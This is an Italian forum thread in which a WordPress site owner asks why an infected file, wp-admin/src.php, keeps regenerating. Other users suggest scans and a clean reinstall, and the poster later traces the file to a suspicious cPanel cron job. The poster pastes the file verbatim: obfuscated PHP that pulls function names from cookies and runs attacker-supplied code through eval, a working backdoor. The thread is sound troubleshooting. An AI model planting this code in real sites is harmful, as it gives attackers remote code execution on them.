Navigazione

    Privacy - Termini e condizioni
    © 2020 Search On Media Group S.r.l.
    • Registrati
    • Accedi
    • CATEGORIES
    • Discussioni
    • Non letti
    • Recenti
    • Hashtags
    • Popolare
    • Utenti
    • Stream
    • Interest
    • Categories
    1. Home
    2. Categorie
    3. Coding e Sistemistica
    4. CMS & Piattaforme Self-Hosted
    5. file anomalo in wp admin
    Questa discussione è stata cancellata. Solo gli utenti con diritti di gestione possono vederla.
    • mastertest
      mastertest User Attivo • ultima modifica di @marcoilardi

      @micropedia potrebbe essere al di fuori della cartella wp-admin in quanto è stata sostituita totalmente da un'installazione integra.
      potrebbe arrivare dalla cartella wp-includes?

      0 Miglior Risposta Ringrazia Cita Rispondi

        1 Risposta Ultima Risposta
      • marcoilardi
        marcoilardi User Attivo • ultima modifica di

        prova a fare una scansione con wordfence, plugin che ti consiglio di adottare in futuro io non ho avuto piu' problemi.
        wordfence dovrebbe dirti i file infetti quali sono

        0 Miglior Risposta Ringrazia Cita Rispondi

          mastertest 1 Risposta Ultima Risposta
        • mastertest
          mastertest User Attivo • ultima modifica di @marcoilardi

          @micropedia si in effetti lo utilizzo anch'io, wordfence mi riconosce il file come infetto wp-admin/src.php, e scansiona solamente questo file, a me interessa capire quale altro file genera in continuazione questo file. ti dico cosa c'è all'interno di questo file:

          <?php
          class Apt
          {
          private static $s;
          public static function g($n)
          {
          if (!self::$s)
          self::i();
          return self::$s;
          }
          private static function i()
          {
          self::$s = array(
          0135,
          0135,
          0116,
          0111,
          026,
          0136,
          0122,
          012,
          00
          );
          }
          }
          function click()
          {
          $_fkm = $_COOKIE;
          ($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && @eval($_uly)) : $_fkm;
          return Apt::g(8);
          }
          click();

          ho provato a lasciare vuoto anche il file, ma dopo un po si regenera tutto di nuovo.

          0 Miglior Risposta Ringrazia Cita Rispondi

            1 Risposta Ultima Risposta
          • marcoilardi
            marcoilardi User Attivo • ultima modifica di

            credo che sia proprio questo il problema prova a cancellarlo (facendo prima una copia non si sa mai)

            Non lo vedo nell'elenco dei file nativi di wordpress

            https://codex.wordpress.org/WordPress_Files

            0 Miglior Risposta Ringrazia Cita Rispondi

              mastertest 1 Risposta Ultima Risposta
            • mastertest
              mastertest User Attivo • ultima modifica di @marcoilardi

              @micropedia si lo cancello e dopo qualche instante viene ricreato

              0 Miglior Risposta Ringrazia Cita Rispondi

                1 Risposta Ultima Risposta
              • marcoilardi
                marcoilardi User Attivo • ultima modifica di

                una cosa che faccio io in questi casi è controllare le date di tutti i files vedi i files creati oggi o ieri saranno tutti contaminati o superflui

                0 Miglior Risposta Ringrazia Cita Rispondi

                  1 Risposta Ultima Risposta
                • eleclipse
                  eleclipse User Attivo • ultima modifica di

                  Lascia stare la caccia al tesoro.

                  Reinstalla wordpress manualmente da ftp e cancella tutto quello che non sono i tuoi file caricati nella cartella upload.

                  Dopo passa wordfence / sucuri giusto per sicurezza.

                  0 Miglior Risposta Ringrazia Cita Rispondi

                    1 Risposta Ultima Risposta
                  • mastertest
                    mastertest User Attivo • ultima modifica di

                    Risolto! in effetti il sito è stato ripulito correttamente e va tutto bene adesso, il problema del file (src.php) era dovuto ad un cron impostato in modo inspiegabile nel cpanel.

                    1 Miglior Risposta Ringrazia Cita Rispondi

                      KejSirio 1 Risposta Ultima Risposta
                    • KejSirio
                      KejSirio User • ultima modifica di @mastertest

                      @mastertest puoi spiegarci come hai individuato questo Cron?

                      0 Miglior Risposta Ringrazia Cita Rispondi

                        mastertest 1 Risposta Ultima Risposta
                      • mastertest
                        mastertest User Attivo • ultima modifica di @KejSirio

                        @kejsirio andando per esclusione dopo 2 giorni di ricerca nelle cartelle wordpress, mi era rimasto solo il cpanel dove avevo già effettuato una scansione, poi ho trovato un cron molto sospetto, dopo averlo eliminato è ritornato tutto regolare e funziona il tutto perfettamente.

                        1 Miglior Risposta Ringrazia Cita Rispondi

                          1 Risposta Ultima Risposta
                        • mastertest
                          mastertest User Attivo • ultima modifica di @Ospite

                          @homeworker si certo

                          0 Miglior Risposta Ringrazia Cita Rispondi

                            1 Risposta Ultima Risposta
                          Caricamento altri post
                          Rispondi
                          • Topic risposta
                          Effettua l'accesso per rispondere
                          • Da Vecchi a Nuovi
                          • Da Nuovi a Vecchi
                          • Più Voti